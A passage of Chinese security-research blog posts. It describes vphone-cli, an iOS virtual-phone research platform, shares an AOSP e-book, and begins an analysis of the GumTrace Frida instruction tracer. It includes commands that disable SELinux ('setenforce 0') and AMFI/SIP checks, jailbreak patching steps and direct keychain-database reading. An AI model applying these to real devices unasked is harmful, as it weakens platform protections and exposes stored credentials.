根据参数选择fw_patch、fw_patch_dev、fw_patch_jb或fw_patch_less。
启动DFU并执行restore_get_shsh和restore。
再次进入DFU，构建并发送SSH Ramdisk。
启动usbmux端口转发并执行CFW安装。
启动首次正常系统并分析串口输出。

它还支持多个实用参数：

make setup_machine JB=1
make setup_machine DEV=1
make setup_machine LESS=1
make setup_machine NONE_INTERACTIVE=1
make setup_machine SUDO_PASSWORD=...
make setup_machine SKIP_PROJECT_SETUP=1
make setup_machine LESS=1 NO_BINPACK=1
make setup_machine LESS=1 NO_VPHONED=1

这些参数解决了不同研究场景下的重复制作问题。比如调试Kernel补丁时可以跳过项目安装，只重复固件和启动流程；做Patchless实验时可以排除binpack或vphoned，观察更小修改面的系统行为。

setup_tools.sh负责依赖安装。它会检查Homebrew依赖，构建trustcache和insert_dylib，创建Python虚拟环境，并在Patchless模式下额外准备apfs_sealvolume。这相比早期手工编译libimobiledevice生态的流程简单很多。

fw_prepare.sh也比早期更灵活。它不再只接受固定URL，而是支持本地IPSW、直接URL、版本号、Build号和固件列表查询。它优先使用aria2c下载，并能基于ipsw工具列出目标设备可下载固件。对于反复尝试不同iOS 26构建的研究者，这比手工找URL可靠得多。

恢复和Ramdisk发送也转向pymobiledevice3桥接。scripts/pymobiledevice3_bridge.py提供usbmux-list、recovery-probe、ramdisk-send、restore-get-shsh和restore-update等命令，减少对外部二进制工具和本地编译状态的依赖。

7 Host环境和AMFI管理

虚拟iPhone依赖Apple私有虚拟化API和私有Entitlements，Host环境一直是最容易失败的地方。当前仓库已经把这部分纳入工程化检查。

boot_host_preflight.sh会检查以下状态：

macOS版本和硬件型号。
是否运行在嵌套Apple VM中。
kern.hv_vmm_present
状态。
SIP状态。
allow-research-guests
状态。
当前kern.bootargs和下次启动的nvram boot-args。
Gatekeeper评估状态。
release二进制、debug二进制和签名debug二进制是否能正常执行。

如果release签名二进制启动即退出137，脚本会提示这是AMFI或执行策略不允许私有虚拟化Entitlements的典型表现。如果Host本身是嵌套Apple VM，它会在--assert-bootable模式下提前失败，避免浪费时间进入VM启动阶段。

当前README给出两类Host安全配置路径。第一类是完全关闭SIP并通过amfi_get_out_of_my_way=1禁用AMFI限制。第二类是保留大部分SIP，只关闭debug限制，再使用amfidont或amfree对项目路径做允许。仓库里的辅助目标是：

make amfidont_allow_vphone

它会构建bundle，然后运行scripts/start_amfidont_for_vphone.sh。当前脚本通过amfidont daemon --path "$PROJECT_ROOT" --spoof-apple为项目路径启动AMFI绕过。Patchless变体对Host执行策略更敏感，README中特别说明需要完整AMFI路径或带-S能力的amfidont路径。

这部分能力的意义在于，项目不再只告诉用户“请关闭SIP/AMFI”，而是提供了可诊断、可复现、可定位的Host启动前检查。

8 VM配置与备份切换

早期虚拟机参数主要靠命令行和脚本隐含约定。当前仓库引入config.plist清单，结构兼容Applesecurity-pcc的VMBundle.Config风格。vm_create.sh和vm_manifest.py会把CPU、内存、磁盘、屏幕、网络、ROM、NVRAM和SEP路径写入VM目录。

默认配置包括：

platformType: vresearch101
cpuCount: 8
memorySize: 8192MB
screen: 1290x2796, 460PPI, scale 3.0
network: NAT
diskImage: Disk.img
nvramStorage: nvram.bin
sepStorage: SEPStorage
romImages: AVPBooter.vresearch1.bin, AVPSEPBooter.vresearch1.bin

VPhoneVirtualMachine会从config.plist加载或生成VZMacMachineIdentifier，并据此解析ECID和预测UDID。预测结果会写入udid-prediction.txt，后续恢复、Ramdisk发送和usbmux端口转发可以用这个身份信息避免多设备环境中的误连。

VM备份能力由三个脚本完成：

vm_backup.sh
把当前vm/保存到vm.backups//，默认排除*_Restore*/固件目录，并使用rsync --sparse处理稀疏磁盘。
vm_restore.sh
把指定备份恢复到活动vm/目录，并检查VM是否仍在运行。
vm_switch.sh
先保存当前VM，再恢复目标备份，实现多环境切换。

对应Make目标为：

make vm_backup NAME=26.1-clean
make vm_restore NAME=26.1-clean
make vm_switch NAME=26.3-jb
make vm_list

这让虚拟iPhone环境更接近“快照式研究资产”。研究者可以保留干净系统、Regular环境、Development环境、Jailbreak环境和不同iOS构建之间的状态，而不必每次重走完整恢复链路。

9 CFW安装能力

CFW安装仍然是从“能启动”走向“能用”的关键阶段。当前Regular和Development路径依然通过Ramdisk SSH修改设备文件系统，Patchless则把部分文件系统变更提前进Swift文件系统重建流程。

基础CFW安装包含以下能力：

安装SystemOS和AppOS Cryptex。
修补seputil的Gigalocker路径格式。
安装AppleParavirtGPUMetalIOGPUFamily虚拟GPU驱动。
安装iosbinpack64基础工具集。
修补launchd_cache_loader，允许修改后的launchd.plist生效。
修补mobileactivationd，绕过激活流程。
注入LaunchDaemons，启动bash、dropbear、trollvnc、rpcserver_ios和vphoned等服务。

Development路径会额外处理调试能力。cfw_install_dev.sh会应用dev overlay，把rpcserver_ios替换为开发版本，还会修补debugserverEntitlements，添加调试所需权限，并修补launchd的jetsam路径，避免启动时陷入initproc崩溃循环。

Jailbreak路径会在基础CFW之外追加越狱相关组件。cfw_install_jb.sh会注入launchd dylib、部署Procursus bootstrap、部署BaseBin hook库、安装TweakLoader.dylib，并把vphone_jb_setup.sh作为首启LaunchDaemon放入系统。

vphone_jb_setup.sh负责首次正常启动后的收尾工作。它会建立/var/jb链接，修复权限，运行prep_bootstrap.sh，安装Sileo，配置APT源，安装TrollStore Lite，刷新uicache，并为SSH交互写入shell profile。日志写入：

/var/log/vphone_jb_setup.log

这说明当前越狱能力已经不仅是内核补丁，而是包含包管理器、用户态hook、插件加载器和首启自修复流程的完整运行环境。

10 vphoned与Guest侧控制协议

vphoned是当前仓库能力扩展中最重要的组件之一。它是一个运行在iOS虚拟机内的Objective-C守护进程，通过LaunchDaemon启动，在vsock端口1337监听Host侧连接。

协议是长度前缀JSON：

[uint32 big-endian length][UTF-8 JSON]

Host侧由VPhoneControl.swift负责连接、握手、自动重连、请求超时、二进制传输和能力检查。Guest侧在握手时返回能力列表，例如hid、devmode、file、keychain、location、ipa_install、clipboard、apps、url和settings。

非Patchless路径下，vphoned还支持自更新。Host在hello消息里携带当前签名vphoned二进制的SHA-256，Guest侧发现哈希不一致后请求更新，Host推送新二进制，Guest写入缓存路径并退出，由launchd重启后切换到新版本。这避免了每次修改Guest代理后都重做CFW安装。

当前Guest控制能力包括：

HID按键注入，支持Home、Power、音量等硬件键。
Developer Mode状态查询和启用。
文件列表、下载、上传、删除、重命名和创建目录。
钥匙串枚举，可通过Security API和直接读取/var/Keychains/keychain-2.db补充结果。
剪贴板读取和写入，支持文本和图片。
应用列表、应用启动、应用终止和前台应用查询。
URL打开。
Settings读取和写入。
位置模拟和停止模拟。
低电量模式同步。
IPA/TIPA安装。
Accessibility树读取，前提是Guest暴露对应能力。

这些能力让虚拟iPhone不再只是VNC里的画面，而是可以被Host程序结构化控制的iOS实例。

11 Host侧自动化Socket

除了Guest内的vphoned，当前仓库还加入了Host侧自动化Socket。VPhoneHostControl.swift会在VM目录下创建Unix domain socket：

vm/vphone.sock

它接受一行JSON命令，执行后返回一行JSON结果。当前支持的命令包括：

{"t":"screenshot"}
{"t":"tap","x":645,"y":1398}
{"t":"swipe","x1":645,"y1":2600,"x2":645,"y2":1400,"ms":300}
{"t":"key","name":"home"}
{"t":"type","text":"Hello"}

除截图外，每个动作默认会等待短暂时间，然后返回一张压缩灰度JPEG截图的Base64字段。这个设计非常适合AI自动化和端到端测试：控制器每执行一次点击、滑动、按键或输入，都能立即拿到视觉反馈，用下一步决策闭环。

README中也明确提到vphone-mcp可以包装这个Socket，向Claude Code或Claude Desktop提供打开应用、返回、滚动、输入文本等高层工具。换句话说，当前vphone-cli已经具备面向AI测试代理的最小控制平面。

12 图形输入和传感器模拟

运行时体验也比早期版本完整很多。

触控方面，VPhoneVirtualMachineView负责把Host侧鼠标事件映射为虚拟触点，并通过私有_VZUSBTouchScreenConfiguration注入到Guest。主机侧自动化Socket的tap和swipe命令复用同一套像素坐标映射。

键盘和硬件键方面，VPhoneKeyHelper和菜单项支持Home、Power、Volume、Spotlight等操作，vphoned侧也可以接收HID按键事件。

显示和录屏方面，VPhoneScreenRecorder使用私有VZGraphicsDisplay截图能力，可以保存截图、复制截图到剪贴板，并用AVFoundation录制30FPS视频。后续提交修复了ImageIO SIGBUS问题，确保录屏总是捕获VM窗口。

位置方面，VPhoneLocationProvider可以同步Host位置，也可以发送预设位置和路线回放。菜单中内置了Apple Park、San Francisco Ferry Building、Times Square和Shibuya Crossing等预设点，还支持Apple Park Loop路线回放。

电池方面，VM内部配置了私有_VZMacSyntheticBatterySource，默认100%充电。菜单侧可以手动设置电量和连接状态，也可以通过IOKit同步Host电池状态，并把Host低电量模式同步到Guest。

Touch ID方面，VPhoneTouchIDMonitor通过macOS私有BiometricKit监听物理Touch ID传感器触摸事件，再把手指按下、抬起和双击等状态转发给Guest。这个能力需要com.apple.private.bmk.allow相关权限，体现了仓库对Host私有框架的进一步利用。

加速设备方面，2026-04-17的提交加入Entropy和Accelerator设备。当前VM配置中包含VZVirtioEntropyDeviceConfiguration，并尝试配置私有_VZMacVideoToolboxDeviceConfiguration和_VZMacNeuralEngineDeviceConfiguration。

这些改动说明项目已经开始模拟“手机运行环境”的外设和传感器，而不仅是让iOS内核启动。

13 文件应用和钥匙串

当前Host侧GUI也从早期单窗口启动器扩展为研究工具界面。

文件浏览器由SwiftUI实现，Host侧通过VPhoneFileBrowserModel和VPhoneFileBrowserView调用vphoned的文件接口。它支持目录浏览、搜索、排序、上传、下载、拖拽、删除、重命名和新建目录。2026-03-09以后还修复了指向文件夹的符号链接打开问题。

应用浏览器通过LSApplicationWorkspace和FrontBoardServices等Guest侧私有API列出应用，区分系统应用、用户应用和运行中应用，支持启动、终止和前台应用刷新。Host菜单会根据Guest能力动态启用或禁用Open URL和Install等动作，避免未连接时误操作。

钥匙串浏览器通过vphoned_keychain提供数据。它既尝试使用SecItemCopyMatching读取可访问项，也直接打开/var/Keychains/keychain-2.db读取genp、inet、cert和keys表。对于安全研究，这比普通iOS模拟器更接近真实设备取证和应用数据分析场景。

安装包支持也更完整。--install-ipa可以在VM启动后自动安装指定IPA或TIPA，菜单安装流程同样支持这两类包。vphoned_install.m会处理包解压、权限修复、Mach-O识别、签名证书、应用注册和清理流程。相比早期单纯依赖外部命令，这已经是Guest内建安装器。

14 Patchless路线

Patchless是近期提交中最值得单独关注的路线。它不是“完全没有补丁”，而是“尽量不走传统安全绕过补丁”。

早期Regular路线的核心思路是修改AVPBooter、iBoot、TXM和Kernel，让它们接受未签名或被修改的系统组件。Patchless路线则尝试从文件系统一致性出发解决问题：把Cryptex并入OS文件系统，修补必要用户态组件，重新生成trustcache、mtree、digest.db和root_hash，再更新BuildManifest中的组件哈希，使启动链尽可能看到一个一致的固件状态。

CryptexFilesystemPatcher中的注释概括了这条路线：

1. Collect the AppOS and SystemOS Cryptex from the iPhone BuildManifest
2. With the OS, AppOS, and SystemOS images, attach them and copy them to a target image
3. Create trustcache for resulting image
4. Create mtree for resulting image
5. Generate digest.db and SystemVolume root_hash
6. Join mtree and digest.db to Ap,SystemVolumeCanonicalMetadata

这条路线对安全研究有两个价值。

一方面，它让研究者可以观察更少安全绕过条件下的系统行为，避免Regular/Jailbreak路径把太多安全机制直接关闭，影响漏洞复现或策略分析。

另一方面，它把iOS系统镜像重建流程工程化了。它要求工具理解AEA加密、APFS镜像、Cryptex内容、dyld链接、trustcache、mtree、digest.db、root_hash和BuildManifest之间的关系，而不只是“哪里检查失败就patch哪里”。

近期提交中加入的embedded AEA key、按需remap fs、Patchless binpack、NO_BINPACK和NO_VPHONED，都说明这条路线仍在快速迭代。

15 越狱插件和用户态扩展

用户特别关心的越狱插件支持，主要体现在Jailbreak变体的几个层次。

第一层是内核和TXM安全绕过。Jailbreak变体启用TXM Dev/JB补丁、Kernel JB补丁、task_for_pid、NVRAM写入、sandbox扩展、MACF路径、dylinker限制、shared region、spawn persona、vm_protect、vm_fault等相关补丁。research/0_binary_patch_comparison.md把JB专属Kernel方法列成25个大项，部分方法内部还包含多个实际patch点。

第二层是BaseBin hooks。CFW安装会部署systemhook.dylib、launchdhook.dylib和libellekit.dylib到/cores/，并通过短路径/b把launchdhook.dylib注入launchd。这为用户态hook和越狱环境初始化提供基础。

第三层是Procursus。cfw_install_jb.sh会部署Procursus bootstrap，首启脚本会建立/var/jb，运行bootstrap准备脚本，配置APT源，并安装Sileo。Sileo出现后，虚拟机就具备了类似真实越狱设备的包管理入口。

第四层是TrollStore Lite。首启脚本会尝试安装com.opa334.trollstorelite，并在安装失败时不再轻易写入done标记，而是让日志暴露失败状态。这让越狱收尾过程更可诊断。

第五层是TweakLoader。2026-03-09的提交加入tweakloader到越狱安装流，当前research/0_binary_patch_comparison.md也把TweakLoader.dylib列为JB安装组件。它被安装到：

/var/jb/usr/lib/TweakLoader.dylib

这意味着当前Jailbreak变体不仅能启动越狱文件系统，还在向“可加载用户tweak、可验证插件行为”的方向推进。

16 当前能力边界

尽管能力已经大幅扩展，vphone-cli仍然是研究工具，不是普通意义上的iOS云手机产品。

首先，它强依赖macOS 15+、Apple Silicon、PV=3私有虚拟化能力和私有Entitlements。Host侧必须处理SIP、AMFI、allow-research-guests和Gatekeeper执行策略。没有这些条件，release签名二进制会直接被系统杀掉。

其次，Nested VM仍然不可用。如果Host本身运行在Apple虚拟机中，Virtualization.framework无法继续启动虚拟iPhone。当前boot_host_preflight.sh已经能提前识别这类环境。

第三，固件补丁虽已大量动态化，但仍跟iOS 26、cloudOS 26和vphone600/vresearch101平台深度绑定。README列出的已测环境集中在Mac16,12和iOS/cloudOS 26.1到26.3.1组合。未来iOS构建改变函数结构、字符串锚点或Image4布局时，仍可能需要重新定位补丁。

第四，Jailbreak变体的能力强，但修改面也最大。它适合逆向分析、调试和越狱生态实验，不适合验证“原厂安全策略下是否可利用”的漏洞条件。遇到策略相关研究时，Patchless或Regular可能更适合作为对照组。

第五，Guest侧高级能力依赖私有框架和运行时权限。应用管理、钥匙串、剪贴板、安装器、位置和Accessibility树都可能随系统版本变化而失效或降级。Host菜单中对Guest能力的动态检查，正是为了处理这类差异。

如果用一句话总结当前vphone-cli：它已经从“启动iOS虚拟机的命令行工具”演化成“面向iOS安全研究的虚拟设备制作和自动化控制平台”。

它的底层能力是PV=3虚拟硬件、PCC固件混合、DFU恢复和引导链补丁。

它的制作能力是Makefile一体化流程、Swift固件补丁管线、Patchless文件系统重建、Ramdisk和CFW安装。

它的运行能力是图形窗口、触控、键盘、串口、网络、SSH、VNC、RPC、位置、电池、Touch ID、截图和录屏。

它的研究能力是vphoned、文件浏览、应用控制、钥匙串读取、IPA/TIPA安装、剪贴板、Settings、Accessibility树和主机侧自动化Socket。

它的越狱能力是Jailbreak固件变体、TXM/Kernel JB补丁、Procursus、Sileo、TrollStore Lite、BaseBin hooks和TweakLoader。

它的环境管理能力是config.plist清单、稳定ECID/UDID、Host预检、AMFI辅助、VM备份、恢复和切换。

上一篇文章的结论是，iOS虚拟手机已经从“固件里发现的内部能力”变成“社区可以启动的研究环境”。现在更准确的结论应该是：vphone-cli已经把这个研究环境推进到可重复制作、可持续维护、可自动化操作、可切换安全强度、可承载越狱插件和动态分析工作流的阶段。

对于iOS逆向工程和移动安全研究来说，这个变化比“能不能看到SpringBoard”更重要。因为真正决定工具价值的不是第一次启动成功，而是能否在后续数百次测试中稳定重建环境、快速切换状态、自动收集反馈，并把Host侧工具链与Guest侧系统能力连接成一个闭环。当前vphone-cli已经基本具备了这个闭环的雏形。

跳转微信打开

电子书分享：安卓系统AOSP技术内幕

Wed, 22 Apr 2026 13:24:00 +0800

原创非虫 2026-04-22 13:24 湖北

电子书分享：安卓系统AOSP技术内幕

这是一本开源的免费电子书，共64个章节，详细讲解AOSP的不同组件。同时这也是一本英文电子书，支持本地浏览器访问。有时间精力的朋友，也可以将其翻译并制作成中文PDF。就是会需要耗费一些时间与Token。

以下是图书的目录：

chapters organized bottom-to-top through the Android architecture:

Part	Ch.	Topics	Status
I	0	Frontmatter	UNDER REVIEW
I	1	Introduction	UNDER REVIEW
I	2	Source Code & Build System (Soong/Bazel/Kleaf)	UNDER REVIEW
I	3	Feature Flags (aconfig)	UNDER REVIEW
II	4	Boot and Init	UNDER REVIEW
II	5	Kernel (GKI)	UNDER REVIEW
II	6	System Properties	UNDER REVIEW
III	7	Bionic & Linker	UNDER REVIEW
III	8	Memory Management	UNDER REVIEW
III	9	Binder IPC	UNDER REVIEW
III	10	HAL (HIDL/AIDL)	UNDER REVIEW
III	11	NDK	UNDER REVIEW
IV	12	Native Services	UNDER REVIEW
IV	13	Graphics & Render Pipeline (OpenGL ES/Vulkan/Skia/HWUI)	UNDER REVIEW
IV	14	Animation System	UNDER REVIEW
IV	15	Audio System (Spatial)	UNDER REVIEW
IV	16	Media & Camera	UNDER REVIEW
IV	17	Sensors	UNDER REVIEW
V	18	ART Runtime	UNDER REVIEW
V	19	Native Bridge (Berberis)	UNDER REVIEW
VI	20	system_server	UNDER REVIEW
VI	21	Intent System	UNDER REVIEW
VI	22	Activity & Window Management	UNDER REVIEW
VI	23	Window System	UNDER REVIEW
VI	24	Display System	UNDER REVIEW
VI	25	View System	UNDER REVIEW
VII	26	Package Manager	UNDER REVIEW
VII	27	Content Providers	UNDER REVIEW
VII	28	Notifications	UNDER REVIEW
VII	29	Power Management	UNDER REVIEW
VII	30	Background Tasks	UNDER REVIEW
VII	31	Multi-User	UNDER REVIEW
VII	32	Account & Sync	UNDER REVIEW
VII	33	Location	UNDER REVIEW
VII	34	Storage	UNDER REVIEW
VIII	35	Networking (VCN/Thread)	UNDER REVIEW
VIII	36	Telephony (IMS)	UNDER REVIEW
VIII	37	Bluetooth	UNDER REVIEW
VIII	38	NFC	UNDER REVIEW
VIII	39	USB & ADB	UNDER REVIEW
IX	40	Security (TEE/Trusty)	UNDER REVIEW
IX	41	Credential Manager	UNDER REVIEW
IX	42	DRM	UNDER REVIEW
X	43	Widgets & RemoteViews (RemoteCompose)	UNDER REVIEW
X	44	WebView	UNDER REVIEW
X	45	Accessibility	UNDER REVIEW
X	46	Internationalization	UNDER REVIEW
XI	47	SystemUI (Monet/Keyguard)	UNDER REVIEW
XI	48	Launcher3	UNDER REVIEW
XI	49	Settings	UNDER REVIEW
XII	50	AI & AppFunctions (Computer Control)	UNDER REVIEW
XII	51	Companion & Virtual Devices	UNDER REVIEW
XIII	52	Mainline Modules (APEX)	UNDER REVIEW
XIII	53	OTA Updates	UNDER REVIEW
XIII	54	Virtualization (pKVM/crosvm)	UNDER REVIEW
XIII	55	Testing (CTS/VTS/Ravenwood)	UNDER REVIEW
XIII	56	Debugging Tools (Perfetto)	UNDER REVIEW
XIV	57	Architecture Support (ARM/x86/RISC-V)	UNDER REVIEW
XIV	58	Emulator	UNDER REVIEW
XIV	59	Device Policy	UNDER REVIEW
XIV	60	Automotive/TV/Wear	UNDER REVIEW
XIV	61	Print Services	UNDER REVIEW
XIV	62	Camera2 Pipeline	UNDER REVIEW
XV	63	Custom ROM Guide (step-by-step)	UNDER REVIEW
App.	A	Key Files Reference	UNDER REVIEW
App.	B	Glossary	UNDER REVIEW

图书的仓库地址：

https://github.com/aospbooks/aosp-internal-book

阅读原文

跳转微信打开

ARM64动态指令追踪工具使用与实现分析

Tue, 14 Apr 2026 10:31:00 +0800

原创非虫 2026-04-14 10:31 湖北

ARM64动态指令追踪工具使用与实现分析

本文基于开源项目GumTrace的源码，对ARM64平台动态指令追踪技术进行深度剖析。从工具使用到引擎实现、从指令解析到污点传播，逐层拆解每一处工程细节。

本文项目开源地址为：https://github.com/patchcore-framework/GumTrace

本文作者：非虫（fei_cong@hotmail.com）

1 引言

在移动安全研究中，逆向分析师常常面临这样的困境：当分析目标是高度混淆的native代码——例如白盒加密、VM保护或自定义协议实现——静态分析几乎无效，而函数级Hook粒度又太粗，这时候需要的是一台真正的"指令级显微镜"。

传统的trace方案各有短板：

方案	原理	不足
Frida Stalker 脚本	JavaScript回调处理每条指令	JS与Native频繁切换，速度极慢
QEMU全系统trace	虚拟化层指令插桩	无法跑真机，兼容性差
DynamoRIO / Pin	动态二进制插桩框架	不支持Android/iOS真机
硬件trace (ETM/CoreSight)	处理器硬件特性	需要特殊硬件调试器，门槛极高

GumTrace走了一条不同的路：它以C++共享库的形式注入目标进程，直接调用Frida Gum引擎的C API进行Stalker插桩，完全绕开JavaScript层，将指令追踪的性能推到了接近极限的水平——项目作者实测每3秒可生成约1GB的trace日志。

本文以GumTrace的源码为蓝本，从使用方法、核心架构、插桩引擎、日志格式、函数识别、平台适配和离线污点分析七个维度，完整呈现ARM64动态指令追踪工具的设计与实现。

2 架构总览

在深入代码细节之前，先建立对GumTrace整体架构的认识。整个系统由三大部分构成：

┌────────────────────────────────────────────────────────────────┐
│                    Frida 注入层（JavaScript）                    │
│  dlopen(libGumTrace.so) → init() → run() → unrun()            │
└──────────────────────────┬─────────────────────────────────────┘
                           │ C ABI
┌──────────────────────────▼─────────────────────────────────────┐
│                    GumTrace 核心引擎（C++）                      │
│                                                                │
│  ┌──────────┐  ┌──────────────┐  ┌──────────────┐             │
│  │ GumTrace │  │CallbackContext│  │ FuncPrinter  │             │
│  │ 追踪调度  │  │  上下文对象池  │  │ 函数参数打印  │             │
│  └────┬─────┘  └──────────────┘  └──────────────┘             │
│       │                                                        │
│  ┌────▼─────────────────────────────────────────┐              │
│  │        Frida Gum Stalker C API               │              │
│  │  gum_stalker_follow / transform / callout    │              │
│  └──────────────────────────────────────────────┘              │
└────────────────────────────────────────────────────────────────┘
                           │ trace.log
┌──────────────────────────▼─────────────────────────────────────┐
│                    离线分析工具                                   │
│  ┌──────────────┐  ┌──────────────┐  ┌──────────────────┐      │
│  │ TraceParser  │  │ TaintEngine  │  │ TaintTracker.1sc │      │
│  │  日志解析器   │  │  污点引擎     │  │ 010 Editor 插件  │      │
│  └──────────────┘  └──────────────┘  └──────────────────┘      │
└────────────────────────────────────────────────────────────────┘

设计哲学：GumTrace的设计遵循"追踪时极致性能，分析时离线处理"的原则。追踪阶段只做最必要的信息记录，所有复杂的数据分析（如污点追踪）都推迟到离线阶段完成。

3 快速上手

3.1 构建

GumTrace支持Android和iOS两个平台。构建依赖Frida Gum静态库（已内置于libs/目录），因此只需要标准的交叉编译环境。

Android构建：

# 编辑 build_android.sh，将 ANDROID_NDK_HOME 指向本机的 NDK 路径
vim build_android.sh
./build_android.sh
# 产物: build_android/libGumTrace.so

构建脚本的核心是通过CMake的Android工具链文件配置交叉编译：

cmake .. \
    -DCMAKE_TOOLCHAIN_FILE="$ANDROID_NDK_HOME/build/cmake/android.toolchain.cmake" \
    -DANDROID_ABI=arm64-v8a \
    -DANDROID_PLATFORM=android-24 \
    -DCMAKE_BUILD_TYPE=Release

iOS构建：

./build_ios.sh
# 产物: build_ios/libGumTrace.dylib

iOS构建使用Xcode的iphoneos SDK，目标架构为arm64，最低支持iOS 12.0。构建结果是一个动态库（.dylib），由于禁用了代码签名（CODE_SIGNING_ALLOWED=NO），需要在越狱设备上使用。

污点分析工具构建：

cd src/taint
mkdir -p build && cd build
cmake .. && cmake --build .
# 产物: taint_tracker

3.2 部署与运行

GumTrace以Frida脚本加载的方式注入目标进程。以Android为例，完整的使用流程如下。

第一步：推送共享库到设备

adb push build_android/libGumTrace.so /data/local/tmp/

注意：如果SO加载失败（dlopen返回NULL），通常是SELinux阻止了从/data/local/tmp/加载共享库。需要先关闭SELinux：
adb shell setenforce 0

第二步：编写Frida脚本

GumTrace导出三个C函数：init、run和unrun。通过Frida的dlopen/dlsym加载库并获取函数指针：

let traceSoName = 'libGumTrace.so'
let targetSo = 'libtarget.so'
let gumtrace_init = null
let gumtrace_run = null
let gumtrace_unrun = null
functionloadGumTrace() {
let dlopen = newNativeFunction(
Module.findGlobalExportByName('dlopen'), 'pointer', ['pointer', 'int'])
let dlsym = newNativeFunction(
Module.findGlobalExportByName('dlsym'), 'pointer', ['pointer', 'pointer'])
let soHandle = dlopen(
Memory.allocUtf8String('/data/local/tmp/' + traceSoName), 2)
    gumtrace_init = newNativeFunction(
dlsym(soHandle, Memory.allocUtf8String('init')),
'void', ['pointer', 'pointer', 'int', 'pointer'])
    gumtrace_run = newNativeFunction(
dlsym(soHandle, Memory.allocUtf8String('run')), 'void', [])
    gumtrace_unrun = newNativeFunction(
dlsym(soHandle, Memory.allocUtf8String('unrun')), 'void', [])
}
functionstartTrace() {
loadGumTrace()
let moduleNames = Memory.allocUtf8String(targetSo)
let outputPath = Memory.allocUtf8String(
'/data/data/com.example.app/trace.log')
let threadId = 0// 0 = 当前线程
let options = Memory.alloc(8)
    options.writeU64(0) // 0=Stand, 1=DEBUG, 2=Stable
gumtrace_init(moduleNames, outputPath, threadId, options)
gumtrace_run()
}
functionstopTrace() {
gumtrace_unrun()
}

第三步：在目标函数执行期间启动追踪

典型模式是Hook目标函数，在onEnter中启动追踪，在onLeave中停止：

let isTrace = false
functionhook() {
let dlopen_ext = Module.getGlobalExportByName('android_dlopen_ext')
Interceptor.attach(dlopen_ext, {
onEnter(args) {
if (args[0].readCString().indexOf(targetSo) > -1)
this.can = true
        },
onLeave() {
if (this.can) {
let targetModule = Process.findModuleByName(targetSo)
Interceptor.attach(targetModule.base.add(0x1234), {
onEnter() {
if (!isTrace) {
                            isTrace = true
startTrace()
this.tracing = true
                        }
                    },
onLeave() {
if (this.tracing) stopTrace()
                    }
                })
            }
        }
    })
}
setImmediate(hook)

第四步：运行并拉取日志

frida -U -f com.example.app -l hook.js
# 等待追踪完成后
adb pull /data/data/com.example.app/trace.log .

3.3 iOS平台使用

iOS的使用流程与Android类似，主要差异在路径和库加载方式：

let traceSoName = 'libGumTrace.dylib'
// iOS 通过沙盒路径存储日志
functiongetSandboxPath(filename) {
const homePath = ObjC.classes.NSString
        .stringWithString_("~")
        .stringByExpandingTildeInPath().toString()
return homePath + '/Documents/' + filename
}
functionloadGumTrace() {
let dlopen = newNativeFunction(
Module.findGlobalExportByName('dlopen'), 'pointer', ['pointer', 'int'])
let soHandle = dlopen(
Memory.allocUtf8String('/var/jb/var/root/' + traceSoName), 2)
// ... 后续与 Android 相同
}

iOS版本额外支持ObjC消息追踪，能自动拦截objc_msgSend并解析类名、selector以及ObjC对象内容（NSDictionary、NSArray、NSString等）。

3.4 API参考

GumTrace对外暴露三个C接口：

接口	签名	说明
`init`	`void init(const char* module_names, char* trace_file_path, int thread_id, GUM_OPTIONS* options)`	初始化追踪器
`run`	`void run()`	启动追踪
`unrun`	`void unrun()`	停止追踪

init参数详解：

参数	说明
`module_names`	要追踪的模块名，多个用逗号分隔，如`"libtarget.so,libutils.so"`
`trace_file_path`	日志输出文件路径
`thread_id`	要追踪的线程ID，`0`表示追踪调用`run()`的当前线程
`options`	选项结构体，`mode`字段控制运行模式

运行模式：

模式	值	行为
Stand	0	标准模式，每20秒刷写一次日志，适合大规模追踪
DEBUG	1	调试模式，每20条指令刷写，日志实时可见
Stable	2	稳定模式，启用内存范围检查和较高的trust阈值，降低崩溃风险

4 日志格式

理解日志格式是后续分析的基础。GumTrace生成的日志是纯文本格式，每条指令占若干行。

4.1 指令行

[模块名] 0x绝对地址!0x相对偏移 助记符 操作数; 寄存器名=值 mem_r=地址 mem_w=地址

分号前是指令本身的信息（模块、地址、反汇编），分号后是运行时状态（寄存器值、内存访问地址）。

4.2 写回行

对于有写操作的指令（如ldr加载、add计算），紧跟一行以->开头的写回行，记录指令执行后目标寄存器的新值：

[libtarget.so] 0x7a3c001890!0x1890 ldr x0, [x1, #0x10]; x1=0x7a3c050000 mem_r=0x7a3c050010
-> x0=0x12345678

这种分行设计使得日志解析器可以精确区分指令执行前后的寄存器状态，为污点分析提供完备的数据流信息。

4.3 函数调用行

当检测到BL/BLR/BR/B指令且跳转目标是已知符号时，生成函数调用记录：

call func: strcmp(0x7a3c050010, 0x7a3c060000)
args0: hello
args1: world
ret: 0xffffffffffffffff

对于JNI调用，格式略有不同：

call jni func: FindClass(0x7a3c000100, 0x7a3c070000)
args1: com/example/MyClass
ret: 0x7a3c080000

4.4 系统调用行

SVC指令触发的系统调用，通过x8寄存器中的系统调用号匹配函数名：

[libtarget.so] 0x7a3c002000!0x2000 svc #0; x8=0x40 ...
call func: openat(0xffffff9c, 0x7a3c090000, 0x0, 0x0)
args1: /proc/self/maps
ret: 0x3

5 初始化流程

init()函数是整个追踪器的启动入口，它完成从引擎创建到模块枚举的全部准备工作。源码位于src/main.cpp。

5.1 Gum引擎与Stalker创建

gum_init();
GumTrace *instance = GumTrace::get_instance();
instance->_stalker = gum_stalker_new();
gum_stalker_set_trust_threshold(instance->_stalker, 0);
gum_stalker_set_ratio(instance->_stalker, 2);

gum_init()初始化Frida Gum运行时。随后创建Stalker实例——这是Frida的代码追踪引擎，它通过动态重编译（JIT）目标代码来实现插桩。

两个关键参数：

trust_threshold
：设为0表示永不信任已编译的代码块，每次执行都重新编译。这保证了追踪的完整性，但会降低性能。
ratio
：Stalker引擎内部的代码缓存扩展比率。默认值较保守，这里设为2以减少重新分配。

在Stable模式下，这两个参数有不同的取值：

if (instance->options.mode == GUM_OPTIONS_MODE_STABLE) {
    gum_process_enumerate_ranges(GUM_PAGE_RW, on_range_found, nullptr);
// ... 排序ranges ...
    gum_stalker_set_trust_threshold(instance->_stalker, 2);
    gum_stalker_set_ratio(instance->_stalker, 5);
}

Stable模式提高trust阈值意味着Stalker可以缓存已编译的代码块，减少重复编译的开销。同时枚举所有可读写内存范围，后续在读取字符串和hexdump时进行安全检查，避免访问无效地址导致崩溃。

5.2 目标模块加载

auto module_names_vector = Utils::str_split(module_names, ',');
for (constauto &module_name: module_names_vector) {
auto *gum_module = gum_process_find_module_by_name(module_name.c_str());
// ...
    gum_module_enumerate_symbols(gum_module, module_symbols_cb, nullptr);
